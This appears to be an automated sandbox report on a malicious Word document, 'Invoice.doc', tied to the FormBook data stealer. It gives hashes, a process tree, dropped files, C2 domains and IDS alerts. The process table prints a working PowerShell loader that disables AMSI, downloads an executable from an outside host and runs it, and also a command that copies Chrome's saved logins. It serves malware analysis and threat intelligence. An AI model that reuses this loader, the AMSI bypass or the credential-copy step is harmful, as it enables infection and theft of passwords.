Field | Value
---|---
File name | Invoice.doc
Full analysis | https://app.any.run/tasks/27b55ddc-fe30-4d11-942d-220e4e3f9605
Verdict | Malicious activity
Threats | FormBook is a data stealer distributed as malware-as-a-service (MaaS). FormBook differs from much competing malware in its extreme ease of use, which allows even inexperienced threat actors to operate it.
Analysis date | January 11, 2019, 12:25:53
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags | 
Indicators | 
MIME | application/msword
File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Title: y8883, Subject: ua241e, Keywords: The transformative moment in Rumis life came in 1244, when he met a wandering mystic known as Shams of Tabriz. umi was 37, a traditional Muslim preacher and scholar, as his father and grandfather had been, says Gooch.c friendship for three years lover and The two of them have this electri beloved [or] disciple and sheikh, its never clear., Comments: Home,News,Sport,Weather,Shop,Reel,Travel,Capital,Culture,Future,Sounds,CBBC,CBeebies,Food,Bitesize,Arts,Make It Digital,Taster,Nature,L, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Jan 10 08:05:00 2019, Last Saved Time/Date: Thu Jan 10 08:05:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 0, Security: 0
MD5 | 037F9E66DD3B71F4B8FC3A3A52A90C20
SHA1 | 0E516072BA747B5F6917971E521F172C18FD5CAC
SHA256 | 7715FD65B7A1AFF18214C55C62BF362BC18A4719F20E62D83566DD05CBBF786B
SSDEEP | 384:y8iS8px8SMDO3ENGONQS5Bksdgv38AzmaMOYN0j1otf:a3yEENGO7yZ7MlC
Extension | Detected type
---|---
.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)
Property | Value
---|---
CompObjUserType | Microsoft Word 97-2003 Document
CompObjUserTypeLen | 32
HeadingPairs | 
TitleOfParts | y8883
HyperlinksChanged | No
SharedDoc | No
LinksUpToDate | No
ScaleCrop | No
AppVersion | 16
CharCountWithSpaces | -
Paragraphs | -
Lines | -
Bytes | 11000
CodePage | Windows Latin 1 (Western European)
Security | None
Characters | -
Words | -
Pages | 1
ModifyDate | 2019:01:10 08:05:00
CreateDate | 2019:01:10 08:05:00
TotalEditTime | -
Software | Microsoft Office Word
RevisionNumber | 1
LastModifiedBy | -
Template | Normal.dotm
Comments | Home,News,Sport,Weather,Shop,Reel,Travel,Capital,Culture,Future,Sounds,CBBC,CBeebies,Food,Bitesize,Arts,Make It Digital,Taster,Nature,L
Keywords | The transformative moment in Rumi’s life came in 1244, when he met a wandering mystic known as Shams of Tabriz. umi was 37, a traditional Muslim preacher and scholar, as his father and grandfather had been,” says Gooch.c friendship for three years – lover and The two of them have this electri beloved [or] disciple and sheikh, it’s never clear.
Author | -
Subject | ua241e
Title | y8883
PID | CMD | Path | Indicators | Parent process | Details
---|---|---|---|---|---
2924 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Invoice.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000
3932 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -noprofile [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);If (test-path $env:APPDATA + '\okyp.exe') {Remove-Item $env:APPDATA + '\okyp.exe'}; $ZLCTZ = New-Object System.Net.WebClient; $ZLCTZ.Headers['User-Agent'] = 'ZLCTZ'; $ZLCTZ.DownloadFile('http://supportwip.com/sweetmoney/sureboy.exe', $env:APPDATA + '\okyp.exe'); (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\okyp.exe'); Stop-Process -Id $Pid -Force | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | WINWORD.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 4294967295; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3580 | "C:\Users\admin\AppData\Roaming\okyp.exe" | C:\Users\admin\AppData\Roaming\okyp.exe | — | powershell.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0
3232 | "C:\Windows\System32\systray.exe" | C:\Windows\System32\systray.exe | | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Systray .exe stub; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3028 | /c del "C:\Users\admin\AppData\Roaming\okyp.exe" | C:\Windows\System32\cmd.exe | — | systray.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
116 | C:\Windows\Explorer.EXE | C:\Windows\explorer.exe | — | | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Explorer; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3116 | "C:\Program Files\Mozilla Firefox\Firefox.exe" | C:\Program Files\Mozilla Firefox\Firefox.exe | | systray.exe | User: admin; Company: Mozilla Corporation; Integrity Level: MEDIUM; Description: Firefox; Exit code: 0; Version: 61.0.2
3168 | /c copy "C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\admin\AppData\Local\Temp\DB1" /V | C:\Windows\System32\cmd.exe | | systray.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID | Process | Key | Operation | Name | Value
---|---|---|---|---|---
2924 | WINWORD.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems | write | 7!% | 372125006C0B0000010000000000000000000000
2924 | WINWORD.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | write | 1033 | Off
2924 | WINWORD.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | write | 1033 | On
2924 | WINWORD.EXE | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | write | WORDFiles | 1311440926
2924 | WINWORD.EXE | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | write | ProductFiles | 1311441040
2924 | WINWORD.EXE | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | write | ProductFiles | 1311441041
2924 | WINWORD.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | write | MTTT | 6C0B0000FE8B30DBA8A9D40100000000
2924 | WINWORD.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems | write | j#% | 6A2325006C0B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
2924 | WINWORD.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems | delete value | j#% | 6A2325006C0B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
2924 | WINWORD.EXE | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | UNCAsIntranet | 0
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2924 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9197.tmp.cvr | — | — | —
3932 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7MVWRVUGPCJIH10UZQLU.temp | — | — | —
2924 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$nvoice.doc | pgc | 4DEEDEE404389A721352098DF5F35B67 | AC97D48C4EA5C347B68376711FF5676C55B328D740FC33416B84D838145F315D
3232 | systray.exe | C:\Users\admin\AppData\Roaming\3Q2AQ-22\3Q2logrc.ini | binary | 2855A82ECDD565B4D957EC2EE05AED26 | 88E38DA5B12DD96AFD9DC90C79929EC31D8604B1AFDEBDD5A02B19249C08C939
3932 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 901ECDF767744E6BB59CB023757886E3 | 48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3932 | powershell.exe | C:\Users\admin\AppData\Roaming\okyp.exe | executable | 765DA31F20FE265BFAAD52A8B7783428 | C2A178F24669726FB79E35B68E57F9511D10D616A9C3E27B359347A7442FB2C0
2924 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 41379A924454D4DBF21EC8153C20C10F | 0C15CF2B44D7D8698623838B4214E135CD0F5B33F8FE0D860DBE04AB98A65B80
3932 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF199d11.TMP | binary | 901ECDF767744E6BB59CB023757886E3 | 48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3232 | systray.exe | C:\Users\admin\AppData\Roaming\3Q2AQ-22\3Q2logim.jpeg | image | B9B7820FC4B4A7688AF78A7C2F0BD2EA | 5F4608D8DF41D9D8EE46CC8B6D236D80B05FD290BB7059DE84B4AA557724A936
3116 | Firefox.exe | C:\Users\admin\AppData\Roaming\3Q2AQ-22\3Q2logrf.ini | binary | 53028481B5B5795F1501241CCC7ABFF6 | 75B5F3045E20C80F264568707E2D444DC7498DB119D9661AE51A91575960FC5A
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
116 | explorer.exe | GET | 301 | 91.197.229.178:80 | http://www.poludi.com/h338/?mz7xU=Mk4ZEShFqULTsaF0XK/8FqKcCk95UNLNJKoy7u5vPmnqz/wagv5VU4tRNIzD42mKcAUBWw==&Un0=9rj8zR5hUB7LxJ00&sql=1 | GB | — | — | malicious |
116 | explorer.exe | GET | — | 154.83.149.29:80 | http://www.57maiche.com/h338/?mz7xU=NV1+jEcSAdddK4garX8ku4se6CqspjOpSP+U2OFBm3+R7b+2CsRubuWy/znMrDf+FjB7Wg==&Un0=9rj8zR5hUB7LxJ00 | US | — | — | malicious |
116 | explorer.exe | GET | — | 93.89.226.17:80 | http://www.magnetaraba.com/h338/?mz7xU=BykNHXwYDJdeDgKR3FWbYQVNXcq2qTzZSeXXVh/qHFW68iISCy7e6kECzKi+UcA0jmuYMQ==&Un0=9rj8zR5hUB7LxJ00&sql=1 | CY | — | — | malicious |
116 | explorer.exe | GET | — | 104.217.42.167:80 | http://www.yncits60.com/h338/?mz7xU=LTBLM06XJVCFnl6kdmraniVJjDPmmd32bKvcr5K5R/32ggOyVf5i9AouFgef/a5XWJTCRg==&Un0=9rj8zR5hUB7LxJ00&sql=1 | US | — | — | malicious |
3932 | powershell.exe | GET | 200 | 91.234.99.161:80 | http://supportwip.com/sweetmoney/sureboy.exe | NL | executable | 167 Kb | malicious |
116 | explorer.exe | POST | — | 104.217.42.167:80 | http://www.yncits60.com/h338/ | US | — | — | malicious |
116 | explorer.exe | POST | — | 91.197.229.178:80 | http://www.poludi.com/h338/ | GB | — | — | malicious |
116 | explorer.exe | POST | — | 91.197.229.178:80 | http://www.poludi.com/h338/ | GB | — | — | malicious |
116 | explorer.exe | POST | — | 104.217.42.167:80 | http://www.yncits60.com/h338/ | US | — | — | malicious |
116 | explorer.exe | POST | — | 93.89.226.17:80 | http://www.magnetaraba.com/h338/ | CY | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
116 | explorer.exe | 154.83.149.29:80 | www.57maiche.com | MULTACOM CORPORATION | US | malicious |
116 | explorer.exe | 104.217.42.167:80 | www.yncits60.com | Psychz Networks | US | malicious |
3932 | powershell.exe | 91.234.99.161:80 | supportwip.com | MAROSNET Telecommunication Company LLC | NL | suspicious |
116 | explorer.exe | 91.197.229.178:80 | www.poludi.com | Gyron Internet Ltd | GB | malicious |
116 | explorer.exe | 80.237.133.41:80 | www.mynuesli.com | Host Europe GmbH | DE | malicious |
116 | explorer.exe | 66.147.244.214:80 | www.newtonjiujitsu.com | Unified Layer | US | malicious |
116 | explorer.exe | 93.89.226.17:80 | www.magnetaraba.com | Fbs Bilisim Cozumleri Tic Ltd Sti. | CY | malicious |
116 | explorer.exe | 192.64.115.93:80 | www.bonzaj.com | Namecheap, Inc. | US | malicious |
Domain | IP | Reputation
---|---|---
supportwip.com | | malicious
www.57maiche.com | | malicious
www.poludi.com | | malicious
www.magnetaraba.com | | malicious
www.sexeuw.info | | unknown
www.yncits60.com | | malicious
www.newtonjiujitsu.com | | malicious
www.bangdai898.com | | unknown
www.mynuesli.com | | malicious
www.bonzaj.com | | malicious
PID | Process | Class | Message |
---|---|---|---|
3932 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
116 | explorer.exe | A Network Trojan was detected | SC SPYWARE Trojan-Spy.Win32.Noon |
116 | explorer.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious HTTP-GET request with body and minimal header |
116 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (GET) |
116 | explorer.exe | A Network Trojan was detected | SC SPYWARE Trojan-Spy.Win32.Noon |
116 | explorer.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious HTTP-GET request with body and minimal header |
116 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (GET) |
116 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST) |
116 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST) |
116 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST) |